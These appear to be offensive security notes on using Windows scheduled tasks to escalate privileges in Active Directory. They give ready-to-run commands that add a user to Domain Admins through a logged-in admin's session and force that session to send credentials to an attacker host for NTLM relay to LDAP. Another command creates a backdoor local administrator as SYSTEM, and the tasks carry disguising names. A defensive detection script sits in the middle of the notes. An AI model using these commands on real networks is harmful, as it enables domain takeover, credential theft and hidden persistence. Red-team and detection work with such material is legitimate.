# schtasks

Can be used for privesc LOL! This article covers it pretty well.

# Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively

Check who's logged in (and look for a DA):

```powershell
Get-Process -IncludeUserName explorer | Select-Object UserName
```

Queue up the task:

```cmd
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

Run it:

```cmd
schtasks /run /tn "TotallyFineTask"
```

# Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively

This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:

```cmd
schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

In another window have something like this going:

```shell
ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv
```

Then fire the schtask!

```cmd
schtasks /run /tn "TotallyFineNotSus"
```

# Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges

Sometimes you might get on a box with NT AUTHORITY\SYSTEM permissions and have problems running net.exe to create a backdoor local admin or add a domain user to a local admin group. In cases like these you can use the scheduled task trick, but this time set /ru to SYSTEM like so:

```cmd
schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f
```
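A defender-side check covering the three task patterns above (net.exe group changes, an IWR call with `-UseDefaultCredentials`, and an interactive-only task running as a privileged account that someone else created). This is an added example, not part of the original notes: it parses `schtasks /query /v /fo CSV` output over a constructed sample that mirrors those tasks, using a subset of the real column names, and assumes the `Author` column holds the creating user, as it does for tasks made with `schtasks /create`.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /v /fo CSV` output: a subset of the real
# columns (names as schtasks emits them), rows made up to mirror the tasks above.
SAMPLE_CSV = r'''"HostName","TaskName","Logon Mode","Author","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Background only","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -k -g -$","SYSTEM"
"WS01","\TotallyFineTask","Interactive only","CORP\lowpriv","net group ""Domain Admins"" lowpriv /add /domain","CORP\a-domain-admin"
"WS01","\TotallyFineNotSus","Interactive only","CORP\lowpriv","powershell.exe IWR http://10.0.0.5 -UseDefaultCredentials","CORP\a-domain-admin"
"WS01","\TotallyFineMaintenanceNotABigDeal","Background only","CORP\lowpriv","net localgroup administrators SuperSecretLocalAdmin /add","SYSTEM"
"WS01","\Backup\NightlyCopy","Background only","CORP\svc-backup","robocopy D:\data \\nas\backup /MIR","CORP\svc-backup"
'''

# net.exe / net1.exe adding a member to a local or domain group
GROUP_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+(?:local)?group\b.*\s/add\b", re.I)
# PowerShell web request that forwards the task account's credentials
WEB_DEFAULT_CREDS = re.compile(r"\b(?:IWR|Invoke-WebRequest)\b.*-UseDefaultCredentials", re.I)
ALWAYS_PRIVILEGED = {"system", r"nt authority\system"}


def find_suspicious_tasks(csv_text, privileged_accounts=()):
    """Return (task name, run-as user, reasons) for tasks matching the abuse patterns.
    privileged_accounts: extra high-value accounts (e.g. Domain Admins), matched
    case-insensitively; SYSTEM is always treated as privileged."""
    privileged = ALWAYS_PRIVILEGED | {a.lower() for a in privileged_accounts}
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":  # schtasks repeats the header per task folder
            continue
        run_as, author, cmd = row["Run As User"], row["Author"], row["Task To Run"]
        reasons = []
        if GROUP_ADD.search(cmd):
            reasons.append("adds a member to a group via net.exe")
        if WEB_DEFAULT_CREDS.search(cmd):
            reasons.append("web request with the run-as account's credentials")
        # /it yields "Interactive only"; a privileged run-as account that did not create
        # the task itself is the pattern of riding another user's logon session
        # (assumption: Author holds the creating user, as with schtasks /create)
        if (run_as.lower() in privileged and row["Logon Mode"].lower() == "interactive only"
                and author.lower() != run_as.lower()):
            reasons.append(f"interactive-only task as {run_as} created by {author}")
        if reasons:
            findings.append((row["TaskName"], run_as, reasons))
    return findings


if __name__ == "__main__":
    for name, user, why in find_suspicious_tasks(SAMPLE_CSV, ["CORP\\a-domain-admin"]):
        print(f"{name} (runs as {user}): {'; '.join(why)}")
```

Feed it live output with `schtasks /query /v /fo CSV > tasks.csv` and pass the Domain Admins members as `privileged_accounts`; the benign defrag and robocopy rows in the sample produce no finding.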

# Get details on when the task last ran

Shows when the task last ran, its last result code, and other details:

```cmd
schtasks /query /tn "Sometask" /v /fo LIST
```

# Find all tasks that start with certain characters

For example, if you queued up a bunch of tasks that started with DB you could list them with the following (note that `findstr /i "DB"` matches DB anywhere in a line, case-insensitively, not only at the start of the task name):

```sql
EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';
```

# Delete a scheduled task

```cmd
schtasks /delete /TN "MyTaskName" /F
```